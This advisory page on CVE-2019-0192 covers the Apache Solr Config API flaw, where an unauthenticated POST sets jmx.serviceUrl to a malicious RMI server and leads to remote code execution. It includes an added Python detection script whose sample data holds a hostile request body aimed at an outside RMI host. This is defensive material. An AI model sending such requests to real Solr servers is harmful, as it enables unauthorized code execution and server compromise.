Vulnerability Notice: CVE-2019-0192

Vendor:
Apache, Red Hat

Affected Product:
Solr, Red Hat Fuse 7.4.0, Red Hat JBoss Fuse 6

CVSS SCORE:
9.8 of 10 (Critical)

Risk Index:
9.16 of 10 (Critical)

Description

A critical vulnerability has been identified in the Config API of Apache Solr. This vulnerability, cataloged as CVE-2019-0192, allows configuring the JMX server via an HTTP POST request. An attacker can exploit this configuration to point the server to a malicious RMI server, facilitating unsafe deserialization that could lead to remote code execution on the Solr server.


Affected Product(s)

  • Apache Solr Versions 5.0.0 to 5.5.5 and Versions 6.0.0 to 6.6.5


Technical Details

The vulnerability identified in Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5 is rooted in the configuration of the Java Management Extensions (JMX) server through the Config API. The Config API is designed to allow administrators to modify the configuration of Solr instances through HTTP requests.

However, it does not adequately validate the inputs it receives, specifically the JMX server URL. Proper validation could have prevented the injection of a malicious JMX server URL. When an attacker sends an HTTP POST request that points the JMX server at a malicious Java Remote Method Invocation (RMI) server, the resulting connection takes advantage of the unsafe deserialization process inherent in Java. Java serialization and deserialization convert objects into a stream of bytes and back again; the deserialization step can be exploited if it processes untrusted data.

This vulnerability enables an attacker to send crafted serialized Java objects to achieve remote code execution (RCE). This attack vector is particularly dangerous as it does not require any authentication, meaning that any attacker with network access to the Solr instance can exploit it. Once executed, the malicious RMI server can execute arbitrary code on the Solr server, potentially leading to a complete system compromise. The ability to exploit this through simple HTTP POST requests amplifies the ease and the impact of the attack.

Additionally, several other APIs within Solr offer extended functionality that could expose similar vulnerabilities if proper input validation is not enforced. The Config API's JMX service URL parameter (`jmx.serviceUrl`) is the specific injection point in this exploit scenario. Various security tools and advisories have reported on this issue, indicating its severity and the need for immediate action.

Detection of exploitation typically involves monitoring HTTP POST requests to the Solr instance, specifically for attempts to reconfigure the JMX server, and watching for outbound connections from the Solr server to unknown RMI addresses. As a matter of basic security hygiene, administrators should also use network segmentation and firewall rules to limit the exposure of critical service endpoints such as Solr instances to the broader internet.
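Detection logic of the kind described above, as an added example that is not part of this advisory: it scans request records (constructed here, as a reverse proxy or WAF might log them) for Config API POSTs that set `jmx.serviceUrl`, extracts the RMI host from the service URL, and compares it against an assumed allowlist (`ALLOWED_JMX_HOSTS`); the core name `mycore` and all sample values are constructed.

```python
import json
import re

# Constructed sample of request records (method, path, raw body); not captures from the advisory.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/solr/mycore/config",
     "body": '{"set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://203.0.113.7:1099/jmxrmi"}}'},
    {"method": "POST", "path": "/solr/mycore/config",
     "body": '{"set-property": {"updateHandler.autoCommit.maxTime": 15000}}'},
    {"method": "GET", "path": "/solr/mycore/select", "body": ""},
    {"method": "POST", "path": "/solr/mycore/config",
     "body": '{"set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://monitoring.internal:1099/jmxrmi"}}'},
]

ALLOWED_JMX_HOSTS = {"monitoring.internal"}  # assumed allowlist of sanctioned JMX/RMI endpoints

CONFIG_API_RE = re.compile(r"^/solr/[^/]+/config(?:/|$)")  # Solr Config API path per core


def find_keys(obj, key):
    """Yield every value stored under `key` at any depth of a parsed JSON structure."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            if k == key:
                yield v
            yield from find_keys(v, key)
    elif isinstance(obj, list):
        for item in obj:
            yield from find_keys(item, key)


def rmi_host(service_url):
    """Return the host named in an RMI-based JMX service URL, or None if there is none."""
    m = re.search(r"rmi://([^:/\s]+)", service_url)
    return m.group(1) if m else None


def triage(requests):
    """Return (path, host, verdict) for each Config API POST that sets jmx.serviceUrl."""
    findings = []
    for r in requests:
        if r["method"] != "POST" or not CONFIG_API_RE.match(r["path"]):
            continue
        try:
            body = json.loads(r["body"])
        except ValueError:
            continue  # not JSON; a fuller detector would also flag raw substring matches
        for url in find_keys(body, "jmx.serviceUrl"):
            host = rmi_host(str(url))
            verdict = "allowed" if host in ALLOWED_JMX_HOSTS else "ALERT: unexpected RMI target"
            findings.append((r["path"], host, verdict))
    return findings
```

Any finding with an ALERT verdict is a candidate for the outbound-connection check the paragraph above describes.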

Correct implementation of security controls and regular updates are essential to mitigate such vulnerabilities. This vulnerability is identically reported under multiple CVE numbers when discussed in different contexts, emphasizing its impact across different Solr versions and the urgency for resolution. Moreover, other affected products such as Red Hat Fuse and Red Hat JBoss Fuse use Apache Solr as a component and should be updated or patched directly to prevent exploitation through vulnerabilities like CVE-2019-0192.

In-depth technical explorations have outlined exact replication steps for vulnerable environments using techniques like Docker containers. These environments are used to understand potential exploitation paths and to develop effective countermeasures. Given the prolific use of Apache Solr by major organizations for search platform functionalities, the broad applicability and exploitability of CVE-2019-0192 necessitate continuous vigilance and proactive security measures.


Weakness

The primary weaknesses associated with this vulnerability are improper input validation and deserialization of untrusted data. Apache Solr’s Config API does not adequately validate the input for the JMX service URL parameter, allowing an attacker to redirect it to a malicious RMI server. Moreover, the vulnerability is exacerbated by the underlying issue of unsafe deserialization, where deserialization of untrusted data can lead to remote code execution, making the system highly vulnerable to attacks.


Impact Assessment

If exploited, this vulnerability could allow an unauthenticated attacker to execute arbitrary code on the affected Solr server. Successful exploitation could lead to a full compromise of the server, including unauthorized access to sensitive data, alteration or deletion of data, and potential lateral movement within the network to compromise other systems. The gravity of this vulnerability is reflected in its high CVSS scores of 9.8 (CVSSv3) and 7.5 (CVSSv2), indicating its significant potential impact on security.

Active Exploitation

We have observed activity from various adversarial actors exploiting this vulnerability in live environments. Public exploit scripts and attacks actively targeting this Apache Solr vulnerability have been documented. Attackers leveraging this vulnerability often aim to execute remote commands to install backdoors, initiate data exfiltration, or use the compromised system for further attacks within the network.

Ransomware Association

This vulnerability has been linked to ransomware attacks, specifically those that exploit the unauthenticated remote-code-execution capability to gain an initial foothold in the network. Once access is achieved, ransomware operators can deploy ransomware payloads to encrypt data and demand ransom payments. Given the criticality of the services often provided by Solr, exploitation of this vulnerability can lead to significant disruptions and potential financial losses due to ransom payments and downtime.


Mitigation and Resolution

We have released a patch that addresses this vulnerability. Please update to Apache Solr version 7.0.0 or later immediately. The new version includes fixes for input validation and safeguards against unsafe deserialization. Additionally, ensure that the JMX service URL is appropriately configured and monitored to resist any unauthorized configuration attempts.


Recommendations

  • We strongly recommend that all customers apply the latest patch as soon as possible.
  • Immediately upgrade to Apache Solr version 7.0.0 or later to mitigate this vulnerability.
  • Regularly review and audit configurations for any signs of unauthorized modifications.
  • Implement network segmentation and firewall rules to restrict access to critical systems.
  • Ensure strict input validation for any externally exposed APIs.
  • Monitor network traffic for unusual patterns that may indicate exploitation attempts.
  • Employ intrusion detection and prevention systems to capture and alert on exploitation attempts.
  • Consider disabling or restricting the use of JMX if not necessary.

References


View In Platform

https://vi.securin.io/vulnerability/detail/cve-2019-0192